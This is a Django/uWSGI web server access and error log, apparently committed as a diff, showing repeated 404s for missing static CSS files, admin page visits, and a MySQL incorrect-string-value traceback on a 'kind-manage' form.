+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 428/549] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 429/550] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:56:30 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 430/551] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:56:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 431/552] 219.228.146.146 () {40 vars in 904 bytes} [Thu Jan 14 07:56:34 2021] GET /kind-manage/? => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 432/553] 219.228.146.146 () {48 vars in 986 bytes} [Thu Jan 14 07:56:34 2021] POST /kind-manage/ => generated 207198 bytes in 117 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 433/554] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 434/555] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 435/556] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 436/557] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 437/558] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 438/559] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 439/560] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 440/561] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:56:34 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 441/562] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:56:34 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 442/563] 219.228.146.146 () {42 vars in 936 bytes} [Thu Jan 14 07:56:37 2021] GET /kind-manage/? => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 443/564] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 444/565] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 445/566] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 446/567] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 447/568] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 448/569] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 449/570] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 43 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 450/571] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:56:37 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 451/572] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:56:38 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 452/573] 219.228.146.146 () {40 vars in 907 bytes} [Thu Jan 14 07:56:39 2021] GET /announcement/ => generated 8247 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 453/574] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 454/575] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 455/576] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 456/577] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 457/578] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 458/579] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 459/580] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 460/581] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:56:39 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 461/582] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:56:39 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 462/583] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:56:41 2021] GET /kind-manage/ => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 463/584] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 464/585] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 465/586] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 466/587] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 467/588] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 468/589] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 469/590] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 470/591] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:56:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 471/592] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:56:42 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 472/593] 219.228.146.7 () {38 vars in 862 bytes} [Thu Jan 14 07:56:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 473/594] 219.228.146.7 () {48 vars in 1006 bytes} [Thu Jan 14 07:56:52 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 474/595] 219.228.146.7 () {40 vars in 919 bytes} [Thu Jan 14 07:57:00 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 2069|app: 0|req: 475/596] 219.228.146.7 () {38 vars in 806 bytes} [Thu Jan 14 07:57:00 2021] GET /favicon.ico => generated 3480 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 476/597] 219.228.146.7 () {48 vars in 1016 bytes} [Thu Jan 14 07:57:02 2021] POST /my-admin/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 477/598] 219.228.146.7 () {40 vars in 926 bytes} [Thu Jan 14 07:57:02 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 478/599] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 479/600] 219.228.146.7 () {38 vars in 888 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 480/601] 219.228.146.7 () {38 vars in 896 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 481/602] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 482/603] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 483/604] 219.228.146.7 () {38 vars in 852 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 39 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 484/605] 219.228.146.7 () {38 vars in 928 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 485/606] 219.228.146.7 () {38 vars in 818 bytes} [Thu Jan 14 07:57:02 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 486/607] 219.228.146.7 () {38 vars in 820 bytes} [Thu Jan 14 07:57:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 487/608] 219.228.146.7 () {40 vars in 930 bytes} [Thu Jan 14 07:57:07 2021] GET /kind-manage/ => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 488/609] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 489/610] 219.228.146.7 () {38 vars in 896 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 490/611] 219.228.146.7 () {38 vars in 888 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 491/612] 219.228.146.7 () {38 vars in 852 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 492/613] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 493/614] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 494/615] 219.228.146.7 () {38 vars in 928 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 495/616] 219.228.146.7 () {38 vars in 820 bytes} [Thu Jan 14 07:57:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 496/617] 219.228.146.7 () {38 vars in 818 bytes} [Thu Jan 14 07:57:07 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 497/618] 219.228.146.7 () {48 vars in 1025 bytes} [Thu Jan 14 07:57:10 2021] POST /kind-manage/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 498/619] 219.228.146.7 () {40 vars in 931 bytes} [Thu Jan 14 07:57:10 2021] GET /kind-manage/ => generated 7353 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 499/620] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 500/621] 219.228.146.7 () {38 vars in 896 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 501/622] 219.228.146.7 () {38 vars in 888 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 502/623] 219.228.146.7 () {38 vars in 852 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
